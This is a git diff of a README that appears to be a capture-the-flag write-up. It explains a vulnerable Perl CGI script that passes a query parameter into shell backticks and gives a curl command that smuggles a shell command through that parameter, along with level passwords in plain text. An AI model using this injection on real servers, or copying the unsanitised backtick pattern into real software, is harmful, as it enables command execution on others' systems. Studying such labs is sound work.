diff --git a/README.mdx b/README.mdx
index 3008c9c..9d2ded3 100644
--- a/README.mdx
+++ b/README.mdx
@@ -282,22 +282,47 @@ getflag: /bin/getflag
 ```
 
 
-# 04 - Todo: perl script problem
-- understand the `.pl`
-- know `2>&1`
+# 04 
+
+Login
+
 ```b
-> nc -vz localhost 4747
-  👆 v: verbose - z: scan if a port is open
-Connection to localhost 4747 port [tcp/*] succeeded!
+> ssh level04@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242
+> Password: qi0maab88jeaj46qoumi7maus
+```
 
-> curl localhost:4747/?x="\`/bin/getflag\`"
+We have a script and maybe it interacts w/ a webpage:
+
+```pl
+#!/usr/bin/perl
+# localhost:4747
+use CGI qw{param};
+  # CGI (Common Gateway Interface)
+  # param: a CGI module func fetches params from HTTP requests
+  # qw: quote words
+print "Content-type: text/html\n\n";
+sub x {
+  $y = $_[0];
+  print `echo $y 2>&1`;
+  # sub -- define subroutine x
+  # $_[0] -- subroutine `x()` takes a single arg`
+  # print w/ backticks invokes a shell command
+  # 2>&1 -- combine stdout and stderr, & means 1 is a fd not a filename
+}
+x(param("x"));
+  # 1st `x` : calling the subroutine
+  # 2nd `x` : a query param
+  # x comes in form of "...?x=getflag"
 ```
 
-- token
+Solution
 
 ```b
-su level05
-> Password: ne2searoevaevoem4ov4ar8ap
+> nc -vz localhost 4747
+      ^ v: verbose, z: scan if a port is open (scanning listening daemons)
+Connection to localhost 4747 port [tcp/*] succeeded!
+
+> curl localhost:4747/?x="\`/bin/getflag\`"
 ```